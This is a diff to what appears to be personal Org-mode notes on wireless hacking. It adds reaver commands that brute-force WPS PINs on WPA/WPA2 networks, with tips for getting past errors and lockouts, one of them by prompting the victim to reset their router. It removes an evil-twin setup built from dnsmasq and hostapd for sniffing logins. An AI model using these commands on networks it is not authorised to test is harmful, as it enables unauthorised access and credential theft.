|
@@ -208,7 +208,7 @@ of the connected clients, instead of the mac address of our network interface:
|
|
|
|
|
|
*** WPA/WPA2
|
|
|
|
|
|
-**** Without a wordlist
|
|
|
+**** Without a wordlist (WPS)
|
|
|
|
|
|
To try to crack a WPA/WPA2 network without using a wordlist, we can exploit the
|
|
|
WPS authentication system, if it's misconfigured.
|
|
@@ -228,9 +228,24 @@ and to crack the network, we first need to associate with the network:
|
|
|
and then, we can bruteforce the WPS pin:
|
|
|
|
|
|
#+BEGIN_SRC bash
|
|
|
- reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -vvv --no-associate
|
|
|
+ reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -vvv -A
|
|
|
#+END_SRC
|
|
|
|
|
|
+***** Bypassing 0x2 and 0x3 errors
|
|
|
+
|
|
|
+In case we get 0x3 and 0x4 errors in reaver, we can add the ~-N~ argument, to
|
|
|
+stop it from sending NACK messages, the end command would be like this:
|
|
|
+
|
|
|
+#+BEGIN_SRC bash
|
|
|
+ reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -A -N
|
|
|
+#+END_SRC
|
|
|
+
|
|
|
+***** Bypassing WPS Lock
|
|
|
+
|
|
|
+We exploit WPS by bruteforcing its pin, this means we try every possible pin,
|
|
|
+some routers lock after a number of failed attemps. The solution is to either
|
|
|
+reset the router, or to get the user to reset their router.
|
|
|
+
|
|
|
**** With a wordlist
|
|
|
|
|
|
First, we need to capture the handshake, to do that, we just need to run
|
|
@@ -416,64 +431,7 @@ need to first, flush iptables:
|
|
|
iptables -p FORWARD ACCEPT
|
|
|
#+end_src
|
|
|
|
|
|
-We need a dnsmasq configuration file:
|
|
|
-
|
|
|
-#+begin_src text
|
|
|
- interface=[interface_name]
|
|
|
- dhcp-range=[ip_range_given_to_clients]
|
|
|
- dhcp-option=3,[gateway_ip_address]
|
|
|
- dhcp-option=6,[dns_server_address]
|
|
|
- address=/#/[address_to_redirect_to]
|
|
|
-#+end_src
|
|
|
-
|
|
|
-For example:
|
|
|
-
|
|
|
-#+begin_src text
|
|
|
- interface=wlan0
|
|
|
- dhcp-range=10.0.0.10,10.0.0.100,8h
|
|
|
- dhcp-option=3,10.0.0.1 # computer ip address
|
|
|
- dhcp-option=6,10.0.0.1
|
|
|
- address=/#/10.0.0.1
|
|
|
-#+end_src
|
|
|
-
|
|
|
-And we can run dnsmasq like this:
|
|
|
-
|
|
|
-#+begin_src bash
|
|
|
- dnsmasq -C [config_file_location]
|
|
|
-#+end_src
|
|
|
-
|
|
|
-And we also need a configuration file for hostapd:
|
|
|
-
|
|
|
-#+begin_src text
|
|
|
- interface=[interface_name]
|
|
|
- ssid=[ssid]
|
|
|
- channel=[channel]
|
|
|
- driver=[driver]
|
|
|
-#+end_src
|
|
|
-
|
|
|
-For example:
|
|
|
-
|
|
|
-#+begin_src text
|
|
|
- interface=wlan0
|
|
|
- ssid=wifi
|
|
|
- channel=1
|
|
|
- driver=nl80211
|
|
|
-#+end_src
|
|
|
-
|
|
|
-And we have now to execute hostapd:
|
|
|
-
|
|
|
-#+begin_src bash
|
|
|
- hostapd [config_file] -B
|
|
|
-#+end_src
|
|
|
-
|
|
|
-When hostapd is running, we must give an IP addres to our interface name, which
|
|
|
-in previous examples was wlan0:
|
|
|
-
|
|
|
-#+begin_src bash
|
|
|
- ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
|
|
|
-#+end_src
|
|
|
-
|
|
|
-And now, we can sniff the login information with wireshark.
|
|
|
+*** WPA/WPA2 Enterprise
|
|
|
|
|
|
** Post-Connection Attacks
|
|
|
|